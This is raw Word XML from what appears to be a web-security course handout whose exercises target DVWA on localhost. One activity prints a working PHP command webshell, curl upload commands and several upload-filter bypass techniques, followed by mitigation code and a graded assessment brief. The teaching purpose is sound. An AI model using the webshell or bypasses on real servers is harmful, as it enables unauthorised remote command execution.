          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What username/password combinations return different status codes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F69B4F"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7: Burp Sequencer (Cookie Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1248E" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Capture Cookie:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intercept login response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD422EC" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Send to Sequencer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Select Set-Cookie header → Send to Sequencer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C6837" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Analyze:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review randomness quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946CD77" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Results:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entropy assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C450CA5"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5.6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Is the session cookie sufficiently random? Could it be predicted?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002FB8C" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="5FE5947E">
          <v:rect id="_x0000_i1032" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78E906" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ACTIVITY 6: WEBSHELL UPLOAD AND EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029069BE"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Understand file upload vulnerabilities and malicious file execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79355A56"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED79DEB"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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intermediate to Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1F08E"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IMPORTANT ETHICAL NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11062333"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xml:space="preserve">This activity is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HIGHLY SENSITIVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Perform ONLY on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33810411" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Isolated lab environment (not connected to network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785C96A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Authorized testing scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CE9C5" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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DVWA or intentionally vulnerable applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F10F58" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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WITH explicit written authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E68893"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Never upload shells to real systems without authorization. This is illegal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B122E92"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1: Identify File Upload Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23914F3D"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In DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899937B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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xml:space="preserve">Login with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>admin:password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB91A0" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Navigate to: Vulnerabilities → File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE8CF3" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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Examine the upload form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330240B6"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6.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What file types does the form accept? What validation exists?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78795876"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2: Create Test WebShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243989B"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Basic PHP WebShell (Educational - Do Not Misuse):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5642685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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8EED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if(isset($_GET['cmd'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFEB9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echo "&lt;pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E349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$cmd = $_GET['cmd'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D141677"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echo "Command: " . htmlspecialchars($cmd) . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AEA10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echo "Output:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463920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system($cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6219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echo "&lt;/pre&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A43C4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA65FD"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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201752E2"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Safer Shell (Output Only):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D375E1"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E010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echo "Server Info:\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AE7B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echo "OS: " . php_uname() . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07779CA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echo "PHP: " . phpversion() . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1F76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lastRenderedPageBreak/>
        <w:t>echo "User: " . get_current_user() . "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E105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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06061AED"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Save as:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33439B7D"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3: Exploit Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B0D663"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Attempt 1: Direct Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D74D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Upload using DVWA form or curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F187D5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-F "uploaded_file=@info.php" http://localhost/vulnerabilities/upload/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DBB57"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If blocked, try bypasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D58C3C2"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Attempt 2: Double Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015ACA70" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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xml:space="preserve">Rename to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314DFF7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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xml:space="preserve">Exploit: Server misconfigures and executes </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> regardless of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0BFD4"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Attempt 3: Null Byte (Older PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BF6BB" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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xml:space="preserve">Rename to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info.php%00.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL encoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5236F"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Attempt 4: MIME Type Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D441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Modify Content-Type header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0938D6C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-F "uploaded_file=@info.php;type=image/jpeg" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64957121"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http://localhost/vulnerabilities/upload/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5421E617"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Attempt 5: .htaccess Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3384D7C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AddType application/x-httpd-php .jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5785FA"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xml:space="preserve">Upload as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, executed as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABB8BA1"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4: Execute Uploaded Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E88816"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Once uploaded successfully:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9A3B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Find upload directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA504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http://localhost/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7676F22F"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http://localhost/vulnerabilities/upload/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35E3F8"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777457"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Execute shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B6FFE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"http://localhost/uploads/info.php?cmd=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E831F25"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"http://localhost/uploads/info.php?cmd=whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074EC86E"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curl "http://localhost/uploads/info.php?cmd=ls%20-la"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BCC58"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Step 5: Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B487F"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Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08692C26" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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lastRenderedPageBreak/>
        <w:t>Question 6.2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> What server-side validation should prevent this?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF5285" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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6.3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> How should uploaded files be stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D924E"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610299F1"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Whitelist extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8AA1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$allowed = ['jpg', 'jpeg', 'png', 'gif'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0200F6C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$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A086817"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if (!in_array($ext, $allowed)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E29D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die('Invalid file type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8658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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C34B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CEA1A7"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Validate file content (magic bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C495A"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$finfo = finfo_open(FILEINFO_MIME_TYPE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836D8B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$mime = finfo_file($finfo, $_FILES['file']['tmp_name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B23AD5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if (!in_array($mime, ['image/jpeg', 'image/png'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BE5899"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die('Invalid file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59A59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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931B086"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4DE064"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Store outside web root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A642C2"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move_uploaded_file($_FILES['file']['tmp_name'], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755BCBA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xml:space="preserve">    '/secure/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA03123"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89EE8B"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Disable script execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77913ABC"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.htaccess: php_flag engine off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19874240" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="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 web.config: &lt;handler path="*" verb="*" modules="StaticFile" ... /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75053FC7"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Question 6.4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is storing files outside the web root critical?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656CADC7" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00885E3F" w:rsidP="00D9219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885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="057EA17C">
          <v:rect id="_x0000_i1033" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15538822" w14:textId="462F720F" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>GRADED ASSIGNMENT (</w:t>
      </w:r>
      <w:r w:rsidR="00885E3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%): WEB SERVER ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A35DA"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct comprehensive web server assessment and document findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710BA31"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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Approximately 3-4 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C3ED60"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Due:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9219C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> End of Week 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12765438"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Assignment Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089A1BD"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Part A: Target Selection &amp; Reconnaissance (20%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EAEBF"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Select ONE target application from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D529C1F" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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DVWA (recommended for beginners)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C16B9" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D40794B" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Vulnerable WordPress installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A1407" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D921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Custom lab application (with instructor approval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F2C08"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Document:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129006D" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219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lastRenderedPageBreak/>
        <w:t>Initial Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02476A" w14:textId="77777777" w:rsidR="00D9219C" w:rsidRPr="00D9219C" w:rsidRDefault="00D9219C" w:rsidP="00D9219C">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Domain/IP information</w:t>
      </w:r>
    </w:p>
